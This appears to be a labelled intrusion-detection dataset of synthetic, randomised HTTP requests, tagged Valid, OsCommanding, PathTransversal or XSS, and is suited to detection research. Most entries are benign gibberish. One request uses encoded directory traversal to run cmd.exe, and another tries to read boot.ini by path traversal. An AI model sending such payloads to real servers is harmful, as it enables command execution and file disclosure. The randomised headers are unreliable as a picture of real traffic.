GET /Icb01WFKSi5qY/MVb7_EbodyBz7/mregTls/bO2GRdW9okhtacces/c1.htm?dptH=ot5u&lEdsde0o7zxw=29%40v17g92&athoc=0d+iftpei%3Bn+d HTTP/1.1
Host: 0.238.221.131:98
Connection: pXi3t
Accept: image/*
Accept-Charset: x-mac-cyrillic;q=0.0, windows-1252, euc-cn;q=0.0, x-mac-arabic, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: nrmIate-eezL;q=0.6, mrh-hcsA3eu, 4ltes-uedhi, aisluhsc-eoft
Cache-Control: no-store
Client-ip: 70.32.176.181
Cookie: yan5e1omnaqta=t5K_V;rohoT=19;UDttAnf=wer;ealsyie=drhp3woeQetode;G.dkXE=tb9b;itohdsiNt67sgto=eeu
Cookie2: $Version="5"
Date: Sun, 18 Jul 04 12:41:18 GMT
ETag: W/"xHFAHvPdU3Ym6I3Px"
Expect: Einw
From: aarli@mLmeltu.be
If-Modified-Since: Thu, 23 Feb 06 11:44:39 GMT
If-Unmodified-Since: Wed, 24 Oct 07 10:33:16 UTC
If-Match: "xP3wdd@mkhiP-ua25"
If-None-Match: "LHXrv3FD@6faSo9g"
If-Range: "fbhak3y8abV@V3bWev"
Max-Forwards: 56
MIME-Version: 0.3
Pragma: stpe=zeaehc
Proxy-Authorization: Basic dE5wcGVlOm9pc3M1Yw==
Authorization: Basic bXM1b3k6ZW8xdGlyeWE=
Range: 04605-
Referer: /wreahy.mspx
TE: trailers,deflate,trailers
Trailer: Pragma
User-Agent: HfnNhtgll4a
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 234x2210
Via: 3.2 50.162.126.178, 7.2 91.175.6.47:2, 5.5 www.eJ5sa.html
Transfer-Encoding: compress
Upgrade: ezh/4.9, hQouO/8.3, Ttomi/2.4, iind/9.4, umvntb/3.3
Warning: 161 www.seronAo.png:075 "fmlpedheomt" 
X-Forwarded-For: 209.31.228.173
X-Serial-Number: 450563801661696804
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 11249
Start - Id: 16801
class: Valid
GET /rcp6GV99MLTSGopenQN/ozVxl9Xuacw/SMtaAe3ngiGwt/iVhtIWJjMz_LobCc1IFg/ghAVtI/5@yYezpBHvBE.VarDXT/rqVsZJ3QRNHi/Lh7Ep/okzg3CnQTOwfA/endahiw/evELoO.Dd.bin?hrmhee=nyeqehtyemocha&hol=%5DubN7smFLionh&usrctmpt=gf%7EbLeeu0yformboe&k3idT=Ygnmeb8ihUNet&ri0=oA8G&n0=espns%3EdeiC11pe&eokhttO3=rttr+&VH0-=6736 HTTP/1.0
Host: 66.83.211.247
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: ythg-onoszdie;q=0.5, a-tmmjh;q=0.9, tOe-i;q=0.9
Cache-Control: only-if-cached
Client-ip: 63.123.55.246
Cookie: cPo0Tmnae4entnn=eeal;59D@I1U3VD8d=scriptgIsock_stream;MLSY@E.Bdz=hhghoiie
Cookie2: $Version="53"
Date: Wed, 12 Dec 07 09:33:12 GMT
ETag: "Ppyt6cEuEC9dpgF"
Expect: 100-continue
From: qeirgp@9goyD.st
If-Modified-Since: Fri, 23 Dec 05 23:22:56 UTC
If-Unmodified-Since: Thu, 15 Dec 05 14:35:34 UTC
If-Match: "Q8ynMzC8qIN-6WE"
If-None-Match: *
If-Range: "BQLzPj_@BefDs4rvHtxA"
Max-Forwards: 4
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest uri=/0naYTtga/isasndt/dhsaNs/gnre.pl
Authorization: tdttn2 goa2=ondtsot
Range: -2205,-4677
Referer: http://iwp1p.gov/oeizmo/iadnnRa/uyt6z.swf
TE: trailers
Trailer: Referer
User-Agent: Mozilla/9.7 (compatible; jml2ca; Solaris; moj3lsex)
UA-CPU: PowerPC
UA-Disp: 081,028,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 561x3269
Via: 9.8 www.tosseyaa.shtml, HTTP/3.5 93.255.62.239
Transfer-Encoding: pSfdSs
Upgrade: ypon/2.7, buer/1.4
Warning: 620 28.253.168.33 "eIhu" "Thu, 07 Feb 08 14:55:42 CET"
X-Forwarded-For: 7.49.87.14
X-Serial-Number: 60090044663
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16801
Start - Id: 20260
class: Valid
GET /enArEydlr5umroevji/ceew5s5ett7txa.php3?ps=9041&2ei4gcamelwut=68969688&ir=47142665 HTTP/1.1
Host: 102.163.47.65
Connection: close
Accept: video/*
Accept-Charset: euc-kr;q=0.3, windows-1254, big5
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-stale=000
Client-ip: 179.205.122.247
Cookie: aeuzodTXraSaer=1hZw@dtfM;processing-instructionAZ9e2=202810730;GJJinsertrgmjB7vR=et;mnv1ff=s0;eot0OkaI=Hsd
Cookie2: $Version="389"
Date: Tue, 04 Nov 08 12:39:59 GMT
ETag: "GRSd.RAB2xqYJdR"
Expect: xoesR8=hdg4
From: eoean@ohdnpug.com
If-Modified-Since: Sun, 06 Jul 08 10:32:56 GMT
If-Unmodified-Since: Sat, 25 Mar 06 24:45:59 UTC
If-Match: *
If-None-Match: "CF3P7yBCA.4zi5d59"
If-Range: *
Max-Forwards: 341
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM Y25lYWFlZXJybjZHZXNkYXRzY21ld2VvZG5zOHVhaGRseGVmZWVodGd3c29lbA==
Authorization: efow 8wflxt=1rbedtwn
Range: 90-31589,62-
Referer: /tqokn/m8bTahsT/aola/Ialiio.php
TE: trailers,trailers
Trailer: Warning
User-Agent: l@MUzGEd http://www.emqS.st
UA-CPU: MIPS
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2457x531
Via: 1.4 200.104.155.155:8, HTTP/2.4 139.161.161.130, mveei/4.3 122.178.68.152:4
Transfer-Encoding: gzip
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 407 www.lti8nm6y.gif "4cis0daFde" 
X-Forwarded-For: 53.85.23.141
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 20260
Start - Id: 9535
class: Valid
GET /vuii4e8h/nd/dHx/lsN3nodei_z8Wt/Ymq88W/s3RLB4u7OPy3HWLR9E/3Il4e/-UiMvC4xq.tiff?lgeqmom=43 HTTP/1.0
Host: 49.242.218.109
Connection: keep-alive
Accept: text/*
Accept-Charset: x-mac-cyrillic;q=0.9, us-ascii;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: e-n2cei4, itop-srfsar
Cache-Control: no-store
Client-ip: 68.90.53.63
Cookie: btsni82h=bCq7pR;tsnleth=qAejeoj7vudLsy5i
Cookie2: $Version="8"
Date: Sun, 06 Mar 05 06:06:32 GMT
ETag: W/"@ooEB@uaCNN9tFEzz0"
Expect: 100-continue
From: anp51@cLdyyihltw.st
If-Modified-Since: Wed, 01 Dec 04 16:09:33 UTC
If-Unmodified-Since: Thu, 10 Jun 04 11:03:12 UTC
If-Match: *
If-None-Match: "h1rndsD9n_AAfZ9"
If-Range: Thu, 20 Dec 07 13:11:21 GMT
Max-Forwards: 5538
MIME-Version: 2.5
Pragma: e='rsvrH'
Proxy-Authorization: UraeR rlDgih=Tobabi
Authorization: Basic b29qdE5qdDo1c0VpRWk=
Range: -473707,-784763,883586-54671
Referer: /nenneeq/tsonid/DjVte/We2re/rueghn.php
TE: gzip,deflate,deflate
Trailer: TE
User-Agent: fBXOVXAB http://www.ainta.be
UA-CPU: 68000
UA-Disp: 389,574,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1124x1179
Via: HTTP/5.1 www.egehszv.jpg, 0.7 172.235.254.65
Transfer-Encoding: compress
Upgrade: zZr/7.6, ri9ps3/0.6
Warning: 724 1.186.0.197:4 "pvtse" 
X-Forwarded-For: 107.141.77.183
X-Serial-Number: 2426894
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9535
Start - Id: 22231
class: Valid
GET /6PjGe/Bnexec3b/iv/gNhNDLqWlKe5CtF.cgi?nacm=As1ynT&sd2oot39w=09V_4H%40F HTTP/1.0
Host: 153.189.188.153
Connection: lnahdwl3
Accept: text/*, audio/basic;q=0.2
Accept-Charset: iso-8859-4;q=0.3, iso-8859-8-i;q=0.5, iso-10646-ucs-2;q=0.0
Accept-Encoding: identity, identity;q=0.5
Accept-Language: irsja4e-e3Oo, 7-jnsrpza, wdelE-bnm;q=0.5, q-mb6d;q=0.5, erimrsE-magra
Cache-Control: max-stale=901
Client-ip: 27.61.205.86
Cookie: awag=haebgktt;ews6ie=26;066B.dPqT=ix];Tihtrrg=52020638;gwKvtuhtetbxne=90542692
Cookie2: $Version="4"
Date: Thu, 28 Jul 05 22:42:33 CET
ETag: "P013iay-N1dwHPpVuB"
Expect: 100-continue
From: orEtts@ismhaeter.de
If-Modified-Since: Fri, 06 Feb 04 07:05:16 UTC
If-Unmodified-Since: Sun, 02 Sep 07 03:43:21 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 24 Mar 05 04:44:10 UTC
Max-Forwards: 30
MIME-Version: 4.2
Pragma: aks='2Shlras'
Proxy-Authorization: Basic dXJsNnJyczpzZWJzM2Rj
Authorization: NTLM aEhkUmVlbG5pajhzbW0wYXNlNWhEa2Vpb2VlZXM0Y0thaXQ=
Range: -09
Referer: http://www.7eualg.com/tiid/4doO.txt
TE: deflate,trailers,chunked;q=0.2
Trailer: Accept-Encoding
User-Agent: Mozilla/8.8 (Windows; U; WinNT 4.5; sv-nD; rv:3.3.5) Gecko/36190968
UA-CPU: Sparc
UA-Disp: 4787,167,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1581x2081
Via: 2.3 103.158.140.18:74
Transfer-Encoding: gzip
Upgrade: llxrnU/8.5, 9sez/6.3, 5o9gtz/1.6, sio/7.4, ahOwn/2.8
Warning: 325 152.245.154.177 "a0rdksFt4rsa" 
X-Forwarded-For: 94.18.15.215
X-Serial-Number: 499244
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22231
Start - Id: 44193
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.esSee.biz:17
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a-gi, at-re
Cache-Control: tr='yalodrl'
Client-ip: 241.231.162.21
Cookie: o2mo=formF;xjpemaasxmovo=14399360;webspedsg=421973
Cookie2: $Version="1"
Date: Fri, 17 Oct 08 04:59:16 CET
ETag: "BRW_@ARVUq6pOiuJ"
Expect: 100-continue
From: rOaz@gEadsxsee.biz
If-Modified-Since: Thu, 08 Dec 05 02:40:00 UTC
If-Unmodified-Since: Fri, 09 Jul 04 12:28:29 CET
If-Match: *
If-None-Match: *
If-Range: "VOsY1E14NnShhSZ1A"
Max-Forwards: 5
MIME-Version: 8.7
Pragma: RF='tner'
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: Basic dG13bHAzYzpkbnVlMA==
Range: 22399-
Referer: http://www.wsoqPpti.de/iaaebey/4r4t/eoegto/Rmsn7bux/rgbip.js
TE: trailers,deflate,trailers
Trailer: Referer
User-Agent: eeheh/9.9.4.2
UA-CPU: PowerPC
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5614x800
Via: FTP/4.4 www.8Itie.jpeg, 6.7 122.224.94.189:28, HTTP/9.0 208.217.89.106
Transfer-Encoding: deflate
Upgrade: daad/0.7, ule/2.7
Warning: 029 235.65.195.127 "i3YfHit9o" 
X-Forwarded-For: 81.148.120.241
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44193
Start - Id: 2727
class: Valid
GET /cI9IQ8YWL9f.nsf?CPeroawem=desotiar2dfo&oN=21367269&ithudd3=7%2F+cdleiercpgroup+by&qDXMN2zxVyNq=eeoo&trs=tt&sn=ryattiuatshoho3ku&eqcenanqNanies=30520370&tezs=1379&mo6ststrtc=0&hssgutOiwt=%26it4&earieeah9sgeKb8=o%3B&iewarnr=WftpLfdlStmochaoahdt&aaTdhraeT93Hdo=3ea&dRvt5d3ul=3u&e3iCin=hi525Z5n HTTP/1.0
Host: www.tuc3eclrzn.cz
Connection: ttsh
Accept: image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=03216
Client-ip: 5.163.223.176
Cookie: oreenhicw9=t-F;omgr7rniadbl=usvaraa ciwezS;Abqlxf2relbo=06769;NFl85ulinkyXa=exmly?ooselectm
Cookie2: $Version="995"
Date: Fri, 13 Apr 07 06:54:12 UTC
ETag: "fVcf6WcZKl0d257X"
Expect: 100-continue
From: dasa@Cnth.cz
If-Modified-Since: Tue, 09 Mar 10 10:08:37 UTC
If-Unmodified-Since: Wed, 02 Mar 05 13:22:28 GMT
If-Match: "79s8lQ@CwQawne0q"
If-None-Match: *
If-Range: Mon, 27 Sep 04 12:49:56 CET
Max-Forwards: 624
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: hnknte 6dhe=ailltedl
Authorization: evtb vfncnl=aynse3n1
Range: 32-25
Referer: http://thho1.net/haaD/pafsm/yytyto/32peen/ne5ube.mdb
TE: chunked;q=0.7,trailers,deflate
Trailer: From
User-Agent: uEtibedr (r7.AFa; sRWraKtF; oZlLpYPyX; cxmpdl1; ii0naM6C)
UA-CPU: 68000
UA-Disp: 991,432,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9002x158
Via: cdegvs/7.6 www.toeAd.png
Transfer-Encoding: gzip
Upgrade: ztd/6.6, uveUC/2.7, edns/8.2, 7mo/6.6
Warning: 722 219.161.37.147 "eueen5o9vYS" "Tue, 30 Aug 05 03:30:07 CET"
X-Forwarded-For: 185.239.118.59
X-Serial-Number: 053261538285243
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2727
Start - Id: 29785
class: Valid
GET /oMMy9/tTnlNieznoeoeeRenisc/wAgy/uonkT0z5nxeeRalsl/b4/IuyitZ6eau/o@yb7OZaC/rhDrsorSt7dnE30AI/etai.jpeg?8ryseaptae=43&iicOstae=+e7c&ie=137&kegswrto3if=hns_&Ain5LOj5http=hVm&lnhHuio=172&8dheattscfm=14368638 HTTP/1.1
Host: www.4ze9n.cz:80
Connection: close
Accept: video/mpeg
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: od-DeW5nF, alceesR5-Ore;q=0.1, slmfT-6;q=0.4, nekoyooe-shdPsf;q=0.4
Cache-Control: min-fresh=20535
Client-ip: 66.205.89.103
Cookie: ve=1;tneeemEfetxa=]Itya4=;Dseesaeusre=34
Cookie2: $Version="92"
Date: Sun, 20 Apr 08 12:29:40 GMT
ETag: "IX5Xjzs12LEu0kOPUkyM"
Expect: 3afhShae
From: mptr@19anuaa52a.net
If-Modified-Since: Sun, 01 Oct 06 13:42:40 CET
If-Unmodified-Since: Tue, 04 Aug 09 11:54:39 GMT
If-Match: "XomgH1jG_XRnhYc1e_"
If-None-Match: *
If-Range: Thu, 01 Jul 04 04:40:26 GMT
Max-Forwards: 793
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest algorithm=Oeah
Authorization: Basic aWlpY2E6dG9vYQ==
Range: -02795
Referer: /lrtaeR.htm
TE: trailers,chunked;q=0.1,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.6 (compatible; Konqueror/2.1; Linux i586; neTlers)
UA-CPU: Sparc
UA-Disp: 2709,734,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2347x796
Via: 1.4 www.rotdn.jpeg:43603, HTTP/0.0 www.mmDo.js
Transfer-Encoding: GEoa
Upgrade: hoc/9.0, nsaeuh/2.0
Warning: 362 90.215.221.94 "tdttdIet" 
X-Forwarded-For: 7.71.153.105
X-Serial-Number: 92915948163168
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29785
Start - Id: 13568
class: Valid
GET /scriptYxp_7Bnodeqm%ulogfcK/sW6yrJzAHOrvT9nO.8/ib/8oMTLseHpH/MtrZ..S.dll?olby=eT_b%40%40 HTTP/1.1
Host: www.uSbs.de
Connection: aeoV7esg
Accept: image/gif;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: sneb='V'
Client-ip: 136.237.9.148
Cookie: 7irne=70;Igozaiht=62984259;qsdwotyeoavsmm=2939;3u8p=St2onsuayvl;ouhstap=06;aitni0chtMep=jhcopy)y
Cookie2: $Version="66"
Date: Sun, 26 Jun 05 21:11:24 UTC
ETag: W/"YjLeFLbFUlEesH2"
Expect: 100-continue
From: rctr@uneqdrer.ch
If-Modified-Since: Thu, 04 May 06 11:10:06 GMT
If-Unmodified-Since: Thu, 14 Jul 05 18:54:28 UTC
If-Match: *
If-None-Match: *
If-Range: "u1Njo0YWyiq9xEa"
Max-Forwards: 33
MIME-Version: 9.2
Pragma: fz='eaua'
Proxy-Authorization: noxn uaenegsM=zmtlt
Authorization: NTLM dGRjbG16dEowYzc5bDdEaUdUaW5EY25ycmF2NTRhSWg=
Range: -808,133-44
Referer: /snViap8b/asfrFh/adoS7/uLi2/oao2efdS.swf
TE: deflate,trailers,chunked;q=0.2
Trailer: TE
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 3.8; hs-ar; rv:0.0.5) Gecko/34793291
UA-CPU: Sparc
UA-Disp: 6775,772,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 138x4900
Via: 5.1 140.111.238.51:755, 2.3 222.37.247.41
Transfer-Encoding: hnWm
Upgrade: tihi9l/6.1, hyla/3.9, 4Coi/5.5, tE2c/8.6, strcfX/0.7
Warning: 052 www.giatfee.htm "0Iebnabrrs8lZcrgnoe" 
X-Forwarded-For: 58.219.72.216
X-Serial-Number: 70032554284651
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13568
Start - Id: 31370
class: Valid
GET /euei219i/metaGfallYTc/eIRs/oZKjz/eJ.QL@.4aNc_8omkmkea/yuK/otestyle/w1ujAL56f9/3.JiE.htm?avitxssm=689&hevwthWciq=f&zib=%3EaeOew6lt%3FR&nnt3Iolaae=n%40e74tx5a+lse+%3A9m&LyKUzlinkWqbody4F=aguwooechoo%28&amwuynae24=ai1T%3Anlocationeen+ndivodelete&iw=g.H7dpQFO_K&trs7y=asd&rsfligtt3et=mx+sp&rminapebiZt=%29s+o5&antGtreo=0vri&elvOpNmh=eFMKQmXAq HTTP/1.1
Host: 121.58.141.190
Connection: close
Accept: */*
Accept-Charset: iso-8859-6, utf-7;q=0.8, iso-8859-4, windows-1254
Accept-Encoding: identity, gzip
Accept-Language: s-tSeenkos;q=0.0
Cache-Control: max-stale
Client-ip: 164.204.220.43
Cookie: emelssd=sA6J1C4uas;TfK7C-decho=\cbinnt;AfincludeprTg=ut
Cookie2: $Version="334"
Date: Sun, 23 Aug 09 09:01:31 UTC
ETag: W/"A0J0pwaWSm06g8As0Q6@"
Expect: 100-continue
From: eoeo@6smfoRe.org
If-Modified-Since: Fri, 04 Apr 08 23:02:07 CET
If-Unmodified-Since: Sat, 20 Mar 10 10:44:22 UTC
If-Match: "pkT.cKERWlZ_VYVOI1"
If-None-Match: *
If-Range: Wed, 27 Dec 06 11:49:20 UTC
Max-Forwards: 2045
MIME-Version: 8.7
Pragma: h='eaewnh'
Proxy-Authorization: NTLM dGVyZHluZW5zcHNkbmFwYWVST2VlamlucGlMaXV0Ym50YU9vY2k=
Authorization: Digest uri=/enehbt/ertldT/rr5T/iieiq/ursmlo.jsp
Range: -34878,6878-7,3101-
Referer: http://diuqseke.ch/tlewCn/re93y/hejendd/tkkzn.msf
TE: gzip;q=0.7
Trailer: Referer
User-Agent: Mozilla/5.3 (compatible; eo5se; Solaris; optse0; d7tinEhh48)
UA-CPU: x86
UA-Disp: 2596,238,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7934x883
Via: 9.3 218.173.55.127, 2.0 www.vhlweo.jpg, sola/6.9 255.250.185.247:73
Transfer-Encoding: compress
Upgrade: ruexiD/5.5
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 12566826495921
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31370
Start - Id: 29212
class: Valid
GET /ipcbau/e5o9R/8O9jBa-JwJetc@V.asmx?eg=Ros&i0rtxeeiTukhbc=02908 HTTP/1.0
Host: www.oeSa.biz:80
Connection: close
Accept: image/jpeg, video/*, video/*;q=0.0
Accept-Charset: iso-8859-8, iso-8859-9, x-mac-greek;q=0.8, koi8;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: e1pe='urN'
Client-ip: 170.251.130.23
Cookie: Fk5ftdropkL=785715843;ns=ncntssstsyLte;xn=mrT;yinohn=f39mg7ybb5C
Cookie2: $Version="3"
Date: Fri, 18 Apr 08 18:41:55 GMT
ETag: W/"etZAFCdpVXdAB-7r1"
Expect: 100-continue
From: aOsere@astiy.biz
If-Modified-Since: Fri, 17 Nov 06 09:19:40 GMT
If-Unmodified-Since: Sun, 22 Apr 07 23:28:13 CET
If-Match: "NMJBf9GJmIH2LLTlJnUj"
If-None-Match: "q6-miGXYCdVP0yvs"
If-Range: Thu, 10 Dec 09 08:26:58 UTC
Max-Forwards: 7
MIME-Version: 8.2
Pragma: 0=T2
Proxy-Authorization: n1eso ltmaml9d=tpeOs0
Authorization: itarl yaSdre=rhnipu
Range: -4
Referer: http://www.oEsA.cz/Elbwg/c0r5stia/ab01.tar
TE: deflate;q=0.9,chunked,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.4 (Machintosh; U; PPC Mac OS X 1.2; ge-iA; rv:5.0.2) Gecko/74329812
UA-CPU: PowerPC
UA-Disp: 323,9503,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 887x0016
Via: 1.2 www.rttT.shtml:03713, FTP/6.2 33.36.55.189
Transfer-Encoding: gzip
Upgrade: itc/2.5
Warning: 612 www.tseeuds.png:12 "ssti0ludmio" "Fri, 01 Jun 07 17:58:45 UTC"
X-Forwarded-For: 232.31.166.192
X-Serial-Number: 417531274115
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29212
Start - Id: 33523
class: Valid
POST /dI/sdru.pl? HTTP/1.0
Content-Length: 248
Content-Language: l
Content-Encoding: identity
Content-Location: /ilsmc.doc
Content-MD5: Z2FoOTlhZHJlMGVhdWdscQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 15 Jul 05 11:02:09 GMT
Last-Modified: Mon, 25 Aug 08 12:43:51 CET
Host: 214.218.252.244
Connection: keep-alive
Accept: text/*, application/x-tar;q=0.9
Accept-Charset: euc-jp;q=0.7, utf-7
Accept-Encoding: gzip, identity, compress;q=0.3, identity;q=0.3
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 22.251.131.103
Cookie: 8sc4iiemrfnE=vare~L4;4psRgjEsh= f85crt|;ase5isw8il=tLw4otgRpec4c;oata2eu81s=b$Wi;tds36si0=in c
Cookie2: $Version="80"
Date: Fri, 20 Mar 09 12:29:19 GMT
ETag: W/"s7IUsgMz4KgdDvA6u"
Expect: 100-continue
From: Towr@gduxvle.gov
If-Modified-Since: Fri, 06 Aug 04 02:48:06 CET
If-Unmodified-Since: Sun, 24 Dec 06 12:16:09 UTC
If-Match: "jEK8TimPp9hAt_djh"
If-None-Match: "YmfOq2CA_pVHk9eimhgK"
If-Range: Fri, 12 Sep 08 21:08:32 CET
Max-Forwards: 6183
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic QVRheXQ4c206RWVkc2VvaA==
Authorization: NTLM aXJubXhraWVmZXNhd1J5Y2lncnlpcjhlOG5uZXZuZXN2ZkEyM2VvbmVubGVp
Range: 90185-
Referer: http://aec9.biz/lnli2.jpeg
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/9.0 (Windows; U; Windows NT 0.9; tm-Fg; rv:2.9.5) Gecko/82237514
UA-Disp: 9881,7058,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 417x756
Via: ges/5.1 www.k8nhe.js:031, HTTP/8.8 www.Ilc3g.gif
Transfer-Encoding: deflate
Upgrade: ttnoi/1.2, yeetc/2.3
Warning: 021 29.168.107.5:9738 "vyoao" "Fri, 21 May 04 05:27:03 CET"
X-Serial-Number: 06516057
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

Vtrbstsen=se2rcneorc8kare9ni&bS1nms=ffpjmooaeweL&Hhonoe2eeirks=A2decl7qCsnl8ot&shrdbeeolde1Pm=20424648&U@Ui@Np=eFVOKfjO1x&e5nsofenuvoy=ooona&rrkwmmtSprn4hF=d&dvtanucaTetn=b1W&iddo=028244&8pQSkeu_D=r6sl(&a1=895904&yrcetaeugrsh= ehz&zt01nerM3oe=153

End - Id: 33523
Start - Id: 23561
class: Valid
GET /j5tatud0piesa3Nhgl/uQd/ayHn/my_TeoKuoFO/eeiotlthueAunna2Owhn/t20ieyampidIOYeein/dtoree7tn.mdb?gotNehfmuUt=tRaK3lTN.5R HTTP/1.1
Host: www.yEjxan.st
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: awi-b;q=0.5, tneaofrc-ot97tnei;q=0.0, ns6yT-noe
Cache-Control: no-transform
Client-ip: 212.20.77.67
Cookie: 9B-M=5138469573;oehsr7issOrs1to=eal5 ;sededfyrto=28;ote0grdeMn=7827957;lerka=nirrd
Cookie2: $Version="02"
Date: Mon, 10 Nov 08 09:03:02 UTC
ETag: ".C0E33fXGDKq97j_pZ-Q"
Expect: rymdnp4s=m3he;caao=roae6o
From: caat@loSde.net
If-Modified-Since: Mon, 20 Oct 08 03:00:53 UTC
If-Unmodified-Since: Fri, 15 Aug 08 21:00:29 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Mar 10 15:16:37 GMT
Max-Forwards: 542
MIME-Version: 2.1
Pragma: 3So='ehdtl2en'
Proxy-Authorization: Basic dHJhSTppdDRkQWloaQ==
Authorization: Digest uri=http://epfcu.net/eh2eaJ0/gyah0u.gif
Range: 9-582047,9-,23678-00
Referer: /inrriNsr/yvkmote/Tcrioe.mp3
TE: chunked;q=0.0,trailers,chunked;q=0.0
Trailer: Referer
User-Agent: llwfu (y4pu2gUXw9)
UA-CPU: StrongARM
UA-Disp: 990,4504,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4426x0282
Via: rhni/7.2 26.3.59.1, FTP/5.9 42.20.19.234
Transfer-Encoding: gzip
Upgrade: wsepm/7.5, 5aaet/0.7, No5jm/7.8, gbfr/4.3
Warning: 209 www.5t5s6.png "thwt9satrcduouI" "Wed, 18 Mar 09 14:43:45 CET"
X-Forwarded-For: 11.102.20.4
X-Serial-Number: 1009110184973666911
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 23561
Start - Id: 45786
class: PathTransversal
GET /ofyN2j/aC/tzthh/dirBo/e6tBjyW2J/_ExSr9T@J/ziiialt/ei5tedtalabnRweu3uf/e1atrhtl5lRD/2K/pwuJh6zlgrc/nnejdeet.js?ioiOr=8DUpIdUvCT&CfjM3=res+&yiionEvriWlnra=sLZ5U&tsIai=filrsdnsnhdumstihc&0yrlI=93&f8gB1A5D=e%3A%5Cwinnt%5Cboot.ini HTTP/1.1
Host: 11.29.26.38:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-10646-ucs-2, x-mac-ce;q=0.4, macintosh
Accept-Encoding: *;q=0.7
Accept-Language: a6-fuweeu, ahi-P
Cache-Control: max-stale
Client-ip: 40.147.120.92
Cookie: 66tyb=639;0AiframedeIh8usrZ9=6;p9aef0odseanh6o=erU
Cookie2: $Version="26"
Date: Mon, 09 Mar 09 24:41:10 CET
ETag: "1UYXYoyn1ISOZ-ytTEbk"
Expect: 100-continue
From: rsj6lTrn@Ezll0rry.ch
If-Modified-Since: Sat, 17 Feb 07 20:53:10 CET
If-Unmodified-Since: Sat, 20 Aug 05 17:53:16 UTC
If-Match: "lbd_K9.Apy.46heIG8"
If-None-Match: "AfiLDG3BqGwy4f0lGj6"
If-Range: *
Max-Forwards: 9
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: poeeh dwdky=eorL
Authorization: Basic ZGtuT2Npajp0TWlPMnQ=
Range: 855-
Referer: /a5atoe/dtoo8m/coetot/gibraTTc/3irsoi7a.css
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: AmgfbH4
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9422x259
Via: 5.0 www.anoIep.jpeg
Transfer-Encoding: gzip
Upgrade: F3awa4/4.3, 9rim7/0.4, reilie/2.8, 3il/4.5, Stse/6.1
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 0.142.120.56
X-Serial-Number: 324157325
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45786
Start - Id: 46475
class: XSS
